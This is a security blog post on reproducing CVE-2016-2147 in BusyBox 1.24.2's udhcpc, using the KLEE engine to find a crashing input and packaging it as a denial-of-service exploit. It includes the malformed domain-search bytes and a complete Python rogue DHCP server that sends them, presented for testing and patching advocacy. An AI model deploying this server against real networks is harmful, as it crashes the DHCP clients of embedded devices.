Replicating CVEs with KLEE

This blog post details the steps taken to replicate the udhcpc process crash in BusyBox 1.24.2 described in CVE-2016-2147 (NVD, nist.gov), and to produce a working denial-of-service exploit. We will use the symbolic execution engine KLEE to help identify parameters that cause the specific crash we are interested in.

This proof of concept helps demonstrate to clients that these bugs are actually exploitable rather than merely a theoretical threat. Now let’s get started with some background.

Background

BusyBox

So, what is BusyBox?

BusyBox is a software suite that provides several Unix utilities in a single executable file. It runs in a variety of POSIX environments such as Linux, Android, and FreeBSD, although many of the tools it provides are designed to work with interfaces provided by the Linux kernel. It was specifically created for embedded operating systems with very limited resources.

Extract from BusyBox – Wikipedia

One of the utilities provided by BusyBox is a DHCP Client (udhcpc).  This very small DHCP client can be used to lease an IP address for a period of time.  Our aim is to crash this DHCP client by crafting a malicious DHCP response.

Existing CVEs

There are a number of CVEs for this executable, but the one we will focus on is CVE-2016-2147.

CVE-2016-2147 describes how an integer overflow in the DHCP client (udhcpc) in BusyBox versions before 1.25.0 allows remote attackers to cause a denial of service (crash) via a malformed RFC1035-encoded domain name, which triggers an out-of-bounds heap write.

Find the Fix

So, the first thing to look at is the patch for the CVE, if one exists.  A quick search through the BusyBox source code downloads page leads to the folder /downloads/fixes-1.24.2 (busybox.net).

This folder contains all the patches for version 1.24.2 of BusyBox.  After examining the patches, we realized that the patches were labelled with the wrong CVE number.  So, the patch for CVE-2016-2147 is actually in the file busybox-1.24.2-CVE-2016-2148.patch.

Looking at the patch, one of the issues seems to be the write of a space character at the end of the destination (highlighted in the above image).  This can go wrong when the variable ‘len’ is zero, because the position just before the end of the output then falls outside the destination buffer, hence the additional check added to the ‘if’ statement in the patch.

Tech Tip:

From a defensive programming point of view, the check should probably have been len > 0 as I doubt negative numbers would be helpful in this situation.

Let’s now examine the call path to the function dname_dec to see how we can control the parameters passed into the function.  The main function udhcpc_main calls udhcp_run_script several times based on the changes in protocol state, and the options of the received packet are handed down the call chain to dname_dec.  So, all we need to do is send a reply that contains option 119 (0x77), which is the ‘domain search’ string option in the DHCP protocol.

Function Call Hierarchy:

udhcpc_main() -> udhcp_run_script() -> fill_envp() -> xmalloc_optname_optval() -> dname_dec()
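
As a rough illustration of what such a reply has to carry, the sketch below encodes a DHCP option as a code byte, a one-byte length and the data, and encodes a well-formed domain name as RFC 1035 labels. The helper names encode_option and encode_domain_name are made up for this example and do not come from BusyBox.

```python
DOMAIN_SEARCH = 119  # 0x77, the 'domain search' option code


def encode_option(code: int, data: bytes) -> bytes:
    """Encode one DHCP option: code byte, one-byte length, then the data."""
    if not 0 < code < 255:
        raise ValueError("codes 0 (pad) and 255 (end) carry no length or data")
    if len(data) > 255:
        raise ValueError("option data must fit in a one-byte length field")
    return bytes([code, len(data)]) + data


def encode_domain_name(name: str) -> bytes:
    """Encode a dotted name as RFC 1035 labels, ending with a NUL byte."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("labels must be 1 to 63 bytes long")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


# A well-formed option 119 for the single search domain "example.com".
option = encode_option(DOMAIN_SEARCH, encode_domain_name("example.com"))
print(option.hex(" "))
```

A legitimate server would send something like the bytes printed here. The exploit replaces the data part with bytes that are not a well-formed name.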

Hunt the Bug

Now let’s look at the code for the function dname_dec in version 1.24.2 of BusyBox where the bug occurs.

What input is required to execute line 82 in the code above with the variable ‘len’ set to zero or less?  Although this function is relatively small, it is a maintenance nightmare!  It uses several pointers, magic numbers and offsets, which make it difficult to read and understand.  We can determine what the function is supposed to do by referring to the domain names specification, RFC 1035.

Code Readability:

crtpos = ((c[0] & 0x3f) << 8) | c[1];

The above line of code is not very readable!

Defining a couple of macros, renaming variables and replacing line 60 in dname_dec with the example below makes the cryptic line above much easier to understand. It also helps prevent typos, as this expression is used elsewhere in the file.

The function name itself is also very ambiguous. For example, decompress_domain_names would be an improvement as the _dec in dname_dec could mean decode, decrement or decrypt, and the initial ‘d’ could be anything.



Example:

#define POINTER_OFFSET_HIGH_BYTE_MASK 0x3f
#define EXTRACT_POINTER_OFFSET(ptr) ((((ptr)[0] & POINTER_OFFSET_HIGH_BYTE_MASK) << 8) | (ptr)[1])

currentByteOffset = EXTRACT_POINTER_OFFSET(currentBytePtr);
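
For readers who want to check the arithmetic, the following Python sketch works through the same extraction on two sample pointers. In RFC 1035 a pointer is two bytes whose top two bits are set; the remaining 14 bits are the offset. The function names are illustrative only.

```python
POINTER_FLAG = 0xC0                    # top two bits set marks a pointer
POINTER_OFFSET_HIGH_BYTE_MASK = 0x3F   # low six bits of the first byte


def is_pointer(first_byte: int) -> bool:
    """True if the byte starts a compression pointer rather than a label."""
    return (first_byte & POINTER_FLAG) == POINTER_FLAG


def extract_pointer_offset(two_bytes: bytes) -> int:
    """Combine the low six bits of byte 0 with byte 1 into a 14-bit offset."""
    high, low = two_bytes[0], two_bytes[1]
    return ((high & POINTER_OFFSET_HIGH_BYTE_MASK) << 8) | low


print(is_pointer(0xC0), is_pointer(0x03))      # True False
print(extract_pointer_offset(b"\xc0\x0c"))     # 12
print(extract_pointer_offset(b"\xc1\x02"))     # 258
```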

So how are we going to work out the parameters of the function dname_dec that will cause it to crash?  We could try and figure out a path through the function and the associated parameter values required by hand, but this could prove difficult for complex functions. Or we could use a tool like KLEE.

This is where KLEE, the symbolic execution engine, comes to the rescue.  As the dname_dec function is self-contained and doesn’t require any global variables, we can create a small test program and get KLEE to determine the inputs to the function that could cause it to crash.

These few lines of C code are all that’s required in addition to the dname_dec function itself.  Note that the ‘len’ parameter has been defined as a char even though the function dname_dec specifies it as an integer.  This is because options in the DHCP protocol have a one-byte length field: although the function will accept larger numbers, the protocol limits us to a single byte.  Restricting the type stops KLEE from generating inputs that we can’t actually send into the function via a DHCP message.  Now we need to compile the code using clang and then run it using KLEE.

Compile:
clang -emit-llvm -g -c test.c -o test.bc
Run:
klee --libc=uclibc --posix-runtime test.bc

Within a few seconds of running KLEE a number of errors are found.

These are not related to the CVE, so we let KLEE continue.  After about one minute, KLEE finds an input that causes the line of code we are interested in (line 82) to be executed.  This is another out-of-bounds pointer error.

All we have to do now is use the ktest-tool in KLEE to show the input that caused the error.  This is done by finding the error file that relates to the line of code we are interested in, and then using the ktest-tool with the associated ktest file as shown below. The error files are numbered in the order in which they are discovered.

From the output of the ktest-tool we can see what the function dname_dec arguments were set to in order to reach line 82 of the code.

Parameters:
Name variable set to: '\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
Len variable set to: 0x03
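
To see why these particular bytes are interesting, the sketch below walks the first Len bytes of Name the way a label decoder would and records the running output length at every NUL terminator. It is a simplified model and not the BusyBox code: it ignores compression pointers (the KLEE input has none), and it assumes, following the patch discussion earlier, that a separator is written just before the current end of the output whenever a terminator is reached.

```python
KLEE_NAME = b"\x00\x01\x00" + b"\x00" * 10   # the 13 bytes shown by ktest-tool
KLEE_LEN = 0x03                              # only the first 3 bytes are used


def trace_terminators(name: bytes, length: int):
    """Walk `length` bytes of label data and note `len` at each NUL.

    Returns (hits, final_len) where hits is a list of
    (offset_of_nul, output_length_at_that_point).
    """
    hits = []
    pos = 0
    out_len = 0          # plays the role of the variable 'len' in the post
    while pos < length:
        label_len = name[pos]
        if label_len == 0:
            hits.append((pos, out_len))
            pos += 1
        else:
            if pos + label_len + 1 > length:
                raise ValueError("label runs past the end of the option")
            out_len += label_len + 1         # label bytes plus a separator
            pos += label_len + 1
    return hits, out_len


hits, total = trace_terminators(KLEE_NAME, KLEE_LEN)
for pos, out_len in hits:
    print(f"NUL at offset {pos}: len={out_len}, separator index={out_len - 1}")
print(f"total decoded length: {total}")
```

In this model the very first byte is a terminator, so the separator would be written at index -1 while ‘len’ is still zero. The one-byte label that follows makes the total decoded length non-zero, so the input is not rejected as an empty result. In C, an index of len - 1 with len equal to zero is either -1 or, if the variable is unsigned, a very large wrapped-around value, which is consistent with the out-of-bounds write described in the CVE.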

The Exploit

Now we need to write a simple Python script to listen for the DHCP Discover broadcast message from the udhcpc client and then reply with DHCP Offer and Ack messages. The DHCP Ack message will contain the ‘domain search’ option set to the values discovered by KLEE.
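
A minimal sketch of such a server, using only the Python standard library, might look like the following. It is an illustration and not necessarily the script used for this post: the IP addresses, lease time and helper names are placeholder assumptions, and the replies are simply broadcast to the client port. It answers a Discover with an Offer and a Request with the malicious Ack.

```python
import socket
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
DISCOVER, OFFER, REQUEST, ACK = 1, 2, 3, 5   # values of option 53
KLEE_DOMAIN_SEARCH = b"\x00\x01\x00"         # first Len (3) bytes of Name


def option(code: int, data: bytes) -> bytes:
    """One DHCP option: code, one-byte length, data."""
    return bytes([code, len(data)]) + data


def message_type(packet: bytes):
    """Return the value of option 53 in a DHCP packet, or None."""
    pos = 240                                # 236-byte header plus cookie
    while pos < len(packet) and packet[pos] != 255:
        if packet[pos] == 0:                 # pad option has no length byte
            pos += 1
            continue
        if pos + 1 >= len(packet):
            break
        code, size = packet[pos], packet[pos + 1]
        if code == 53 and size == 1 and pos + 2 < len(packet):
            return packet[pos + 2]
        pos += 2 + size
    return None


def build_reply(xid: bytes, chaddr: bytes, msg_type: int,
                your_ip: str = "192.168.0.50", server_ip: str = "192.168.0.1",
                extra_options: bytes = b"") -> bytes:
    """Build a BOOTREPLY with the given DHCP message type and options."""
    header = struct.pack(
        "!BBBB4sHH4s4s4s4s16s64s128s",
        2, 1, 6, 0,                          # op, htype, hlen, hops
        xid, 0, 0,                           # xid, secs, flags
        b"\x00" * 4,                         # ciaddr
        socket.inet_aton(your_ip),           # yiaddr (placeholder address)
        socket.inet_aton(server_ip),         # siaddr (placeholder address)
        b"\x00" * 4,                         # giaddr
        chaddr, b"", b"",                    # chaddr, sname, file
    )
    options = (
        option(53, bytes([msg_type]))
        + option(54, socket.inet_aton(server_ip))        # server identifier
        + option(51, struct.pack("!I", 3600))            # lease time, seconds
        + option(1, socket.inet_aton("255.255.255.0"))   # subnet mask
        + extra_options
        + b"\xff"                                        # end option
    )
    return header + MAGIC_COOKIE + options


def serve(bind_ip: str = "0.0.0.0") -> None:
    """Answer Discover with an Offer and Request with the malicious Ack."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.bind((bind_ip, 67))                 # DHCP server port
    while True:
        request, _ = sock.recvfrom(2048)
        kind = message_type(request)
        if kind == DISCOVER:
            reply = build_reply(request[4:8], request[28:44], OFFER)
        elif kind == REQUEST:
            evil = option(119, KLEE_DOMAIN_SEARCH)
            reply = build_reply(request[4:8], request[28:44], ACK,
                                extra_options=evil)
        else:
            continue
        sock.sendto(reply, ("255.255.255.255", 68))   # DHCP client port
```

Calling serve() needs permission to bind UDP port 67 and should only be done on an isolated test network. The transaction ID and client hardware address are copied from the request so that the client accepts the reply as its own.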

We can use Docker to create a test environment with the required version of BusyBox.

Docker BusyBox Test Environment:

docker pull busybox:1.24.2
docker run -ti busybox:1.24.2

Below is the Python code for our UDP server.

With our UDP server running, any time the BusyBox udhcpc process runs it will crash with a segmentation fault as shown below.

The Wireshark capture below shows our special ‘domain search’ option containing the values discovered by KLEE.

Conclusion

This example highlights the importance of keeping software patched and up to date, which prevents attackers from exploiting known bugs that have already been fixed in later releases of the software.

Tools like KLEE can also be used during the development phase of a project to help prevent software being released with these types of bugs in the first place.